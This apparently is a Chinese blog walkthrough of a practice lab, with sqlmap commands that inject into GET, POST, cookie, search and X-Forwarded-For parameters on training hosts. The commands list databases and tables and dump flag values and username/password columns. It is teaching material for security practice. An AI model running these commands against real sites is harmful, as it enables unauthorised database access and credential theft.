Sqlmap

Sqlmap

1、Sqlmap对get请求数字型、字符型注入## 标题
2、sqlmap对Get请求注入
对http://www.whalwl.host:8001/bug/sql_injection/sql_num.php进行get注入
命令python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” --dbs
在这里插入图片描述

查询dwvs库表名
命令:

python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” -D dwvs --tables

在这里插入图片描述
查dwvs库中flag表的字段名
命令:

python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” -D dwvs -T flag --columns

在这里插入图片描述

显示flag表中flag字段
命令:

python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” -D dwvs -T flag -C flag --dump

在这里插入图片描述

Sqlmap对post请求注入

首先用burp进行抓包
在这里插入图片描述
将报文复制粘贴在1.txt 将1.txt放入
在这里插入图片描述

命令:

python sqlmap.py -r 1.txt

在这里插入图片描述

查库
命令:

python sqlmap.py -r 1.txt --dbs

在这里插入图片描述

查test库中表名
命令:

python sqlmap.py -r 1.txt -D test --tables

在这里插入图片描述

查wan表中字段
命令:

Python sqlmap.py -r 1.txt -D test -T wan --columns

在这里插入图片描述

显示字段
命令:

Python sqlmap.py -r 1.txt -D test -T wan -C username,password --dump

在这里插入图片描述

2、对此网站进行sqlmap cookie注入

http://www.whalwl.host:8009/user.php?id=1
命令:

Python sqlmap.py -u “http://www.whalwl.host:8009/user.php?” --cookie “id=1--level 2 --tables

在这里插入图片描述
查this_flag字段
命令:

python sqlmap.py -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1"  --level 2 -T this_flag --columns

在这里插入图片描述
查看flag值
命令:

python sqlmap.py -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1"  --level 2 -T this_flag -C flag --dump

在这里插入图片描述

3、Sqlmap搜索型注入

http://www.whalwl.host:8002/search.php
查数据库
命令:

python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" --dbs

在这里插入图片描述
查dwvs库表名
命令:

python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" -D dwvs --tables

在这里插入图片描述
查flag字段
命令:

python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" -D dwvs -T flag --columns

在这里插入图片描述

flag值
命令:

python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" -D dwvs -T flag -C flag --dump

在这里插入图片描述

4、X-Forwarded-For注入 手工注入和sqlmap注入
1、Sqlmap注入
Burp抓包
并添加
X-Forwarded-for: 8.8.8.8*
在这里插入图片描述
复制粘贴至1.TXT
在这里插入图片描述
命令:

python sqlmap.py -r 1.txt --dbs

在这里插入图片描述

命令:

python sqlmap.py -r 1.txt -D xff --tables

在这里插入图片描述
命令:

python sqlmap.py -r 1.txt -D xff -T this_flag --columns

在这里插入图片描述

命令:

python sqlmap.py -r 1.txt -D xff -T this_flag -C flag --dump

在这里插入图片描述

2、手工注入

链接:
https://blog.csdn.net/mutou990/article/details/107761999

相关推荐
©️2020 CSDN 皮肤主题: 数字20 设计师:CSDN官方博客 返回首页